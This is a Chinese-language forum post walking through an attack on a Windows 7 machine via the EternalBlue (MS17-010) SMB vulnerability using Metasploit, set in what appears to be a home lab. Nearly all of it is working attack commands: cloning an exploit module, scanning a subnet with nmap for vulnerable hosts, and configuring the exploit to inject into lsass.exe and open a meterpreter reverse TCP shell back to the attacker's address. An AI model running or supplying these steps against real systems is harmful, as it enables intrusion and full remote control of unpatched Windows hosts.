搜索
查看: 5149|回复: 0

永恒之蓝”ms17-010的exp攻击

[复制链接]

330

主题

177

回帖

1071

积分

vip用户

积分
1071

注册会员活跃会员热心会员

QQ
发表于 2018-5-9 08:02:53 来自手机 | 显示全部楼层 |阅读模式
MSF框架实现“永恒之蓝”ms17-010的exp攻击
其实我们这里所说的使用MSF 实现 “永恒之蓝”的快速攻击,就是利用Metasploit中针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限。我这里简单的记录下整个攻击利用所需要的工具准备、利用过程以及后渗透的一些简单内容。
本次用到的环境:
kali系统.ip地址:192.168.1.106
目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.102
具体的步骤如下:
kali系统下安装wine32:
dpkg --add-architecture i386 && apt-get update &&apt-get install wine32
ShellCopy
git clone下载其利用脚本

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
ShellCopy
然后将脚本拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb
cd    Eternalblue-Doublepulsar-Metasploit/
cp  -r  deps/  eternalblue_doublepulsar.rb    /usr/share/metasploit-framework/modules/exploits/windows/smb
ShellCopy
nmap漏洞指定扫描:

nmap -n -p445 --script smb-vuln-ms17-010 192.168.0.0/24 --open
ShellCopy
启动msf,然后进行一系列设置:
service postgresql start
msfconsole
ShellCopy
search  eternalblue
use  exploit/windows/smb/eternalblue_doublepulsar
ShellCopy
进行攻击载荷的配置工作:

set  DOUBLEPULSARPATH  /usr/share/metasploit-framework/modules/exploits/windows/smb/deps     
set  ETERNALBLUEPATH   /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set  PROCESSINJECT   lsass.exe
set  TARGETARCHITECTURE  x64
set  rhost  192.168.1.102
show targets
set  target 8
set  payload windows/x64/meterpreter/reverse_tcp
show options
set  lhost 192.168.1.106
exploit
ShellCopy
效果如下
08-01-05-1075635207.png
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表